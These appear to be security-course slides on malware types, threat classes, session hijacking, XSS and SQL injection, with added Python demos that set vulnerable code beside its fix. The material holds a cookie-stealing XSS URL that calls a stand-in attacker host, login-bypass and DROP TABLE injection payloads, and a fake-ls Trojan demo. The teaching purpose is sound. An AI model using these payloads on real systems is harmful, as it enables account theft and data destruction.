Worms & Trojan Horses
– Worms
• Particular to networked computer systems
• Gain access to resources that point to other computers
• Replicate themselves to multiple systems
• Rarely dangerous, mostly annoying
– Trojan Horses
• Code that embeds itself into something useful
• Collects information and sends it to a known site on the network
• Can also allow external takeover of your system (Back Orifice)
"Good viruses"
• Are hard to detect
• Are hard to destroy
• Spread widely
• Can re-infect cleaned files
• Are easy to create
• Are machine independent
Hiding places
• Boot sector
• Memory-resident viruses
• Macro, library etc. viruses
[Diagram: normal process: Boot Strap Loader → System Initialization; infection: Boot Strap Loader → Virus Code → System Initialization]
Effects and causes
Effect: Attach to executable program
  How caused: modify file directory; write to executable file
Effect: Attach to data or control file
  How caused: modify directory; rewrite data; append to data; append data to itself
Effects and causes (contd.)

Effect              How caused?
Remain in memory    · Intercept interrupts and modify handlers
Infect disks        · Intercept interrupt
                    · Intercept OS call
                    · Modify system file
                    · Modify ordinary executables
Spread infection    · Infect boot sector
                    · Infect system program
                    · Infect ordinary program
                    · Infect data that controls ordinary programs
Malware
Malware is software designed to infiltrate or damage a computer system without the owner's informed consent. It is a portmanteau of the words "malicious" and "software". The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.
Software is considered malware based on the perceived intent of the creator rather than any particular features. It includes computer viruses, worms, trojan horses, most rootkits, spyware, dishonest adware, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant.
Malware

• Modern malicious code ("malware")
  – Around 1999 the first large-scale propagation of e-mail-borne malware occurred
  – Virus protection is now largely reactive
  – E-mail infections are insidious because they bypass firewalls: the message arrives over allowed traffic
  – Multi-module programs and plug-ins increase the attack surface
  – Dynamic linking increases the problem as well
  – Mobile code (Java, JavaScript, ActiveX, plug-ins) provides an easier delivery mechanism
Vulnerability to Malware

In this context, as throughout, it should be borne in mind that the "system" under attack may be of various types, e.g. a single computer and operating system, a network or an application.

Various factors make a system more vulnerable to malware:

• Homogeneity – e.g. when all computers in a network run the same OS: if you can break that OS, you can break into any computer running it.
• Defects – most systems contain errors that malware can exploit.
• Unconfirmed code – code from a floppy disk, CD-ROM or USB device may be executed (e.g. by autorun) without the user's agreement.
• Over-privileged users – some systems allow all users to modify their internal structures.
• Over-privileged code – most popular systems give code executed by a user all the rights of that user, so any program the user runs can do anything the user can.
Types of Malware

1. Worms and viruses are computer programs that replicate themselves without human intervention. The difference is that a virus attaches itself to, and becomes part of, another executable (i.e., runnable) program, whereas a worm is self-contained and does not need to be part of another program to replicate itself.

2. A trojan, or trojan horse, is software that is disguised as a legitimate program in order to entice users to download and install it. In contrast to worms and viruses, trojans are not directly self-replicating. They can be designed to do various harmful things, including corrupting files, erasing data and installing other types of malware.

3. A backdoor (usually written as a single word) is any hidden method for obtaining remote access to a computer or other system. Backdoors typically work by allowing someone or something with knowledge of them to use special password(s) and/or other actions to bypass the normal authentication procedure (e.g., user name and password) on a remote machine (i.e., a computer located elsewhere on the Internet or another network) and gain access to the all-powerful root (i.e., administrative) account.
Types of Malware (contd.)

4. A rootkit is software that is secretly inserted into a computer, usually once an intruder has already gained access to the root account, and which lets the intruder keep controlling the computer at will. Rootkits frequently include functions to hide the traces of their penetration, such as deleting log entries or hiding processes and files. They typically include backdoors so that the intruder can easily regain access at a later date, for example in order to attack other systems at specific times.

5. Spam is unwanted e-mail sent out in large volume. Although people receiving a few pieces of spam per day might not think it is anything to be too concerned about, it is a major problem for several reasons: its huge volume (perhaps half or more of all e-mail) places a great load on the entire e-mail system, it often carries other types of malware, and much of its content is fraudulent.

Organizations typically have to devote considerable resources to filtering out and deleting spam without losing legitimate e-mail, which distracts them from their primary tasks.
Steps to Counter Malware

There are a number of steps that computer users can take to minimize the chances of becoming infected by malware. They include:

– Using relatively secure software and keeping it patched
– Providing physical security for computers and networks
– Enforcing the use of strong passwords
– Employing firewalls
– Using malware detection programs
– Avoiding opening e-mail attachments of unknown origin
– Avoiding the downloading of dubious programs
– Avoiding use of the root account except when absolutely necessary
Trojan Horse

• Malicious program disguised as an innocent one
  – Could modify/delete the user's files, send important information to the cracker, etc.
• The program has to get to the computer somehow
  – The cracker disguises it as a new game, an e-card, a fake Windows Update site, etc.
• When run, the Trojan Horse executes with the user's privileges
• Examples:
  – Hide a program in a directory on the search PATH under a common typo of a real command: la for ls
  – A malicious user puts a malicious ls in a directory that precedes the system directories on the PATH (e.g. the current directory when "." is on the PATH) and lures the superuser into running it
    • The malicious ls could make the user the superuser (e.g. by installing a setuid shell)
    • Denning's paper, 1999
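Added example, not from the slides: a constructed demonstration of the PATH Trojan above. It builds a fake "system" bin directory holding the genuine ls and a world-writable shared directory where an attacker has dropped a fake ls plus a typo-squat named la, then shows which file a shell would execute under different PATH orders. The directories, scripts and names are all made up for the demo; nothing is actually executed, only resolved.

```python
"""PATH lookup Trojan horse: a fake ls and a typo-squatted la (added example)."""
import os
import shutil
import stat
import tempfile
from typing import List, Optional, Tuple


def make_executable(path: str, body: str) -> str:
    """Write a small shell script and mark it executable (constructed stand-in)."""
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def build_demo() -> Tuple[str, str]:
    """Create two constructed directories: a 'system' bin holding the genuine ls,
    and a world-writable shared directory where the attacker dropped a fake ls
    and a typo-squat named la (the slide's example)."""
    root = tempfile.mkdtemp(prefix="trojan-demo-")
    system_bin = os.path.join(root, "bin")
    shared = os.path.join(root, "shared")
    os.mkdir(system_bin)
    os.mkdir(shared)
    make_executable(os.path.join(system_bin, "ls"), "#!/bin/sh\necho genuine ls\n")
    make_executable(os.path.join(shared, "ls"),
                    "#!/bin/sh\necho trojan ls  # payload runs with the caller's privileges\n")
    make_executable(os.path.join(shared, "la"),
                    "#!/bin/sh\necho trojan la  # catches the common typo of ls\n")
    return system_bin, shared


def resolve(command: str, search_path: List[str]) -> Optional[str]:
    """Return the file a shell would run for command, given this PATH order.
    shutil.which applies the same first-match rule a shell uses."""
    return shutil.which(command, path=os.pathsep.join(search_path))


def classify(found: Optional[str], shared: str) -> str:
    """Label a resolved path as the genuine binary or the attacker's."""
    if found is None:
        return "command not found"
    return "trojan" if os.path.dirname(found) == shared else "genuine"


def demo() -> dict:
    system_bin, shared = build_demo()
    return {
        # "." (the shared dir) ahead of the system bin: the fake ls wins
        "dot_first_ls": classify(resolve("ls", [shared, system_bin]), shared),
        # system bin first: the genuine ls wins for a correctly typed command ...
        "dot_last_ls": classify(resolve("ls", [system_bin, shared]), shared),
        # ... but a typo still falls through to the attacker's la
        "dot_last_la": classify(resolve("la", [system_bin, shared]), shared),
        # no untrusted directory on the PATH: the typo is just an error
        "clean_path_la": classify(resolve("la", [system_bin]), shared),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:15s} -> {outcome}")
```

Putting "." at the end of the PATH only fixes the first case; the typo-squat still wins, which is why root's PATH should contain no directory that other users can write to.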
Login Spoofing

• Specialized case of Trojan Horse
  – Attacker displays a custom screen that the user believes belongs to the system
  – User responds by typing in user name and password, which the attacker's program records before handing over to the real login
  – Countered by a key sequence that user programs cannot intercept, e.g. CTRL+ALT+DEL in Windows (the secure attention sequence)
Logic Bombs

• Piece of code, in the OS or an application, which is dormant until a certain time has elapsed or an event has occurred
  – The event could be a missing employee record in payroll
• Could act as a Trojan Horse/virus once triggered
• Also called "slag code" or "time bomb"
• Recovery options for a firm include:
  – Calling the police
  – Rehiring the programmer
Trap Doors

• Code in a system inserted by a programmer to bypass a normal check
• Ken Thompson, "Reflections on Trusting Trust" (1984)
  – A hole in a UNIX system utility (login accepting a fixed password) inserted by a modified C compiler, which also re-inserted the modification whenever it compiled itself; the back door therefore survived even though neither the login source nor the compiler source showed it
Buffer Overflow

• The C compiler does no array bounds checking
  – A great many programs are written in C
  – A cracker can force his own routine to run by writing past the end of an array, e.g. overwriting the saved return address on the stack so that the function returns into attacker-supplied code
Policies, Standards & Baselines

• Security Policy – an overall general statement produced by senior management.
• Standards – mandatory activities, actions, rules or regulations.
• Baselines – the minimum level of security that is required; a consistent reference point.
• Guidelines – recommended actions, industry best practices.
• Procedures – detailed step-by-step tasks developed to provide standardization of activities.
Common Threat Classification

Layer        Threats                              Examples
Network      Threats against the network          Spoofed packets, etc.
Host         Threats against the host             Buffer overflows, illicit paths, etc.
Application  Threats against the application      SQL injection, XSS, input tampering, etc.
Examples of Network Threats

Threat                   Examples
Information gathering    Port scanning
                         Using trace routing to detect network topologies
                         Using broadcast requests to enumerate subnet hosts
Eavesdropping            Using packet sniffers to steal passwords
Denial of service (DoS)  SYN floods
                         ICMP echo request floods
                         Malformed packets
Spoofing                 Packets with spoofed source addresses
Examples of Host Threats

Threat                    Examples
Arbitrary code execution  Buffer overflows in ISAPI DLLs (e.g., MS01-033)
                          Directory traversal attacks (MS00-078)
File disclosure           Malformed HTR requests (MS01-031)
                          Virtualized UNC share vulnerability (MS00-019)
Denial of service (DoS)   Malformed SMTP requests (MS02-012)
                          Malformed WebDAV requests (MS01-016)
                          Malformed URLs (MS01-012)
                          Brute-force file uploads
Unauthorized access       Resources with insufficiently restrictive ACLs
                          Spoofing with stolen login credentials
Exploitation of open      Using NetBIOS and SMB to enumerate hosts
ports and protocols       Connecting remotely to SQL Server
Examples of Application Threats

Threat                  Examples
SQL injection           Including a DROP TABLE command in text typed into an input field
Cross-site scripting    Using malicious client-side script to steal cookies
Hidden-field tampering  Maliciously changing the value of a hidden field
Eavesdropping           Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking       Using a stolen session ID cookie to access someone else's session state
Identity spoofing       Using a stolen forms authentication cookie to pose as another user
Information disclosure  Allowing the client to see a stack trace when an unhandled exception occurs
OWASP Top Ten Web Vulnerabilities (2004 edition)

• A1. Unvalidated Input
• A2. Broken Access Controls
• A3. Broken Authentication and Session Management
• A4. Cross Site Scripting Flaws
• A5. Buffer Overflows
• A6. Injection Flaws
• A7. Improper Error Handling
• A8. Insecure Storage
• A9. Denial of Service
• A10. Insecure Configuration Management
Session Management

• Authentication and Session Management: "Session hijacking"
  – 'Hijack' another user's session by intercepting or predicting the cookies the site sends (allows impersonation by using an established, authenticated session)
• How do you protect it?
  – Integrity with a keyed hash (a MAC; an unkeyed hash can simply be recomputed by the attacker)?
  – Encryption?
  – Encode it with an easily reversible scheme? (offers no protection: the attacker decodes, modifies and re-encodes)
  – Timeouts for the lifetime of the session ID?
  – Prohibit predictable session IDs and cookies
• Hackers will test it by:
  – Logging on and off over and over again, and at different times, to look for patterns in the IDs they are issued
Session Management (contd.)

• Authentication and Session Management: Session Hijacking
  – Two consecutive logins to the same site and the cookie each one sets:

1st Try:
rbcSetCookie("F100","1/WL2/6a0yKsQJ13A3B4NnSan97lZARQN69zCMZDoezJ5De0AX8bD5S5HScdvXE2DMuVESNApHR2SE5WNwRs4ngmvuEQ__/XQAAAA__/S0/PB", null, "/");

2nd Try:
rbcSetCookie("F100","1/WK2/H2BlqWdlkC28v8o1dYQkeA9l3p5hmAEK3LsHyree7gKBXvuWQgoGy52i5QDSsmOc4CasIZ7YqOBcUeuac96oyg__/XQAAAA__/S0/PB", null, "/");

• Things to try:
  – Save the page, modify it and resubmit with new values
  – Modify the cookie
  – Re-use the same cookie one day later
  – Test limits
  – Test hidden forms and variables
  – Change variables
  – Expiry?
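Added example, not from the slides: a session ID scheme that answers the protection questions on the previous slide (unpredictable ID, integrity with a keyed hash, timeout) next to the predictable counter scheme the slide warns about, plus the attacker's check from the "Things to try" list: log in repeatedly and see whether the next ID can be guessed. The server key, lifetime, cookie layout and the assumption that user names contain no "|" are all choices made for this demo.

```python
"""Session ID issuance and verification (added example)."""
import hashlib
import hmac
import secrets
import time
from typing import List, Optional

# Assumption: in production this key comes from configuration; generated here.
SERVER_KEY = secrets.token_bytes(32)
SESSION_LIFETIME = 15 * 60  # seconds after issue before the ID stops being accepted


def weak_session_id(counter: int) -> str:
    """The predictable scheme the slide warns about: a counter anyone can extrapolate."""
    return f"{counter:08d}"


def issue_session(user: str, now: Optional[float] = None) -> str:
    """Random 128-bit ID, bound to the user and issue time by an HMAC tag.
    Assumes user contains no '|' (the field separator chosen for this demo)."""
    issued = int(now if now is not None else time.time())
    sid = secrets.token_urlsafe(16)          # 128 bits from the OS CSPRNG
    payload = f"{user}|{sid}|{issued}"
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_session(cookie: str, now: Optional[float] = None) -> Optional[str]:
    """Return the user if the cookie is untampered and unexpired, else None."""
    now = now if now is not None else time.time()
    try:
        user, sid, issued, tag = cookie.split("|")
        issued_at = int(issued)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, f"{user}|{sid}|{issued}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    if now - issued_at > SESSION_LIFETIME:
        return None
    return user


def predict_next(ids: List[str]) -> Optional[str]:
    """The attacker's test: given IDs from repeated logins, guess the next one.
    Succeeds only when the IDs form an arithmetic progression."""
    try:
        nums = [int(i) for i in ids]
    except ValueError:
        return None
    steps = {b - a for a, b in zip(nums, nums[1:])}
    if len(steps) == 1:
        return f"{nums[-1] + steps.pop():08d}"
    return None


if __name__ == "__main__":
    print("weak IDs, attacker predicts:", predict_next([weak_session_id(n) for n in (41, 42, 43)]))
    cookie = issue_session("alice")
    print("strong cookie:", cookie)
    print("verifies as:", verify_session(cookie))
    print("after tampering:", verify_session(cookie.replace("alice", "admin", 1)))
```

Only the server holds SERVER_KEY, so an attacker who reads or forges a cookie cannot produce a valid tag; and because the ID itself is random, predict_next gets nothing to extrapolate.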
Cross Site Scripting

• "Cross-Site Scripting"
  – A web application takes input from a user but fails to validate the input
  – The input is echoed directly in a web page
  – The input could be malicious JavaScript; when echoed and interpreted in the destination browser, any number of issues could result
Cross-Site Scripting (XSS) Attacks

• Modified URL
  – URL parameters are modified to contain script code
  – Input is not validated and is displayed as entered on the resulting dynamic web page
• XSS – vulnerable targets
  • Weblogs (online journals)
  • Web bulletin boards
  • Chat rooms
  • Guest books
  • Web mail clients
  • User confirmation forms in banking applications
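Added example, not from the slides: the modified-URL case above, reduced to a constructed request handler that echoes a name parameter. The vulnerable version drops the parameter straight into the page; the fixed version escapes it for the HTML body context, and a third function shows that a JavaScript string context needs different escaping (HTML entities would be wrong there). The host names, the handler and the payload are made up for the demo.

```python
"""Reflected XSS: echoing a parameter unescaped vs. escaping for its context (added example)."""
import html
import json
from urllib.parse import parse_qs, urlsplit


def render_unsafe(name: str) -> str:
    """What the slide describes: the parameter is echoed straight into the page."""
    return "<p>Hello, " + name + "!</p>"


def render_escaped(name: str) -> str:
    """HTML body context: <, >, &, ' and " become entities, so the browser shows
    the payload as text instead of parsing it as markup."""
    return "<p>Hello, " + html.escape(name, quote=True) + "!</p>"


def js_string_literal(value: str) -> str:
    """JavaScript string context: JSON-encode the value (escapes quotes, backslashes
    and control characters) and additionally break every '</' so the literal can
    never close the enclosing <script> element."""
    return json.dumps(value).replace("</", "<\\/")


def render_in_script(name: str) -> str:
    """Embedding user data inside inline script, with the JS-context escaping."""
    return "<script>var user = " + js_string_literal(name) + ";</script>"


def handle_request(url: str, safe: bool = True) -> str:
    """Constructed handler for a page like /hello?name=...; safe=False reproduces
    the vulnerable behaviour for comparison."""
    name = parse_qs(urlsplit(url).query).get("name", [""])[0]
    return render_escaped(name) if safe else render_unsafe(name)


def injects_markup(page: str, payload: str) -> bool:
    """True if the attacker's payload survives verbatim in the rendered page."""
    return payload in page


if __name__ == "__main__":
    # Constructed attack URL: the script would ship the victim's cookie elsewhere.
    url = "http://bank.test/hello?name=%3Cscript%3Edocument.location%3D'http://attacker.test/%3Fc%3D'%2Bdocument.cookie%3C/script%3E"
    print("vulnerable:", handle_request(url, safe=False))
    print("escaped:   ", handle_request(url))
    print("in script: ", render_in_script("</script><script>alert(1)</script>"))
```

The escaping function has to match where the data lands: html.escape is right for element content and quoted attributes, js_string_literal for inline script, and neither is a substitute for the other.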
XSS: Script Injection Demo
XSS: Script Injection Demo (Contd.)
SQL injection

SQL injection is a security vulnerability that arises where an application builds SQL statements from untrusted input, so that the attack reaches the database layer through the application.

• A trick to inject a Structured Query Language (SQL) query or command as input via web pages
• SQL statements are "injected" into an existing SQL command
• Injection occurs through malformed application input:
  – Text box
  – Query string
  – Manipulated values in HTML (e.g. hidden fields)
SQL injection

• Example of attack:
  – SQL query in web application code:
    "SELECT * FROM users WHERE login = '" + userName + "' and password= '" + password + "';"
  – Hacker logs in as: ' or '' = ''; --
    • SELECT * FROM users WHERE login = '' or '' = ''; --'; and password='';
  – Hacker deletes the users table with: ' or '' = ''; DROP TABLE users; --
    • SELECT * FROM users WHERE login = '' or ''=''; DROP TABLE users; --'; and password='';
SQL Injection – The Problem

Expected:
Username: Akhi
Password: p@$$w0rd

SELECT COUNT(*) FROM Users WHERE username='Akhi' and password='p@$$w0rd'

The unexpected:
Username: ' OR 1=1 --
Password: (empty)

SELECT COUNT(*) FROM Users WHERE username='' OR 1=1 -- and password=''

Everything after -- is a comment, so the password check disappears, the count equals the number of rows in Users, and the login succeeds with no password at all.
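Added example, not from the slides: the login query from the two slides above run against a constructed in-memory SQLite table, once built by string concatenation and once with bound parameters, using both the ' OR 1=1 -- bypass and the DROP TABLE payload. The table, its two rows and the clear-text passwords exist only for the demo. Python's sqlite3 execute() refuses more than one statement per call, so the stacked DROP TABLE variant is run through executescript() to stand in for a driver that accepts stacked queries.

```python
"""SQL injection in a login check: string-built query vs. bound parameters (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table. Passwords are stored in clear only to
    keep the demo short; a real table would hold salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Akhi", "p@$$w0rd"), ("bob", "hunter2")])
    conn.commit()
    return conn


def build_query(user_name: str, password: str) -> str:
    """The slide's query, built by concatenation: the input becomes part of the SQL."""
    return ("SELECT COUNT(*) FROM users WHERE login = '" + user_name +
            "' and password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, user_name: str, password: str) -> int:
    """Returns the row count the application would treat as 'authenticated' if > 0."""
    return conn.execute(build_query(user_name, password)).fetchone()[0]


def login_vulnerable_stacked(conn: sqlite3.Connection, user_name: str, password: str) -> None:
    """Same concatenation, run through executescript() to stand in for a database
    driver that accepts several statements in one call; this is the path the
    slide's DROP TABLE payload needs."""
    conn.executescript(build_query(user_name, password))


def login_safe(conn: sqlite3.Connection, user_name: str, password: str) -> int:
    """Parameterised query: the driver sends the values separately from the SQL
    text, so quotes, comment markers and semicolons in the input stay data."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? and password = ?"
    return conn.execute(sql, (user_name, password)).fetchone()[0]


def table_exists(conn: sqlite3.Connection, name: str = "users") -> bool:
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row is not None


# The two payloads from the slides.
BYPASS = "' OR 1=1 --"
DROP = "' OR '' = ''; DROP TABLE users; --"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, real credentials:", login_vulnerable(conn, "Akhi", "p@$$w0rd"))
    print("vulnerable, bypass payload:  ", login_vulnerable(conn, BYPASS, ""))
    print("safe, bypass payload:        ", login_safe(conn, BYPASS, ""))
    print("generated SQL:", build_query(BYPASS, ""))
    login_vulnerable_stacked(conn, DROP, "")
    print("users table still exists after DROP payload:", table_exists(conn))
```

The fix is not quoting or filtering the input but never letting it become SQL text: with placeholders the same payloads match zero rows and the table survives.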
Thank You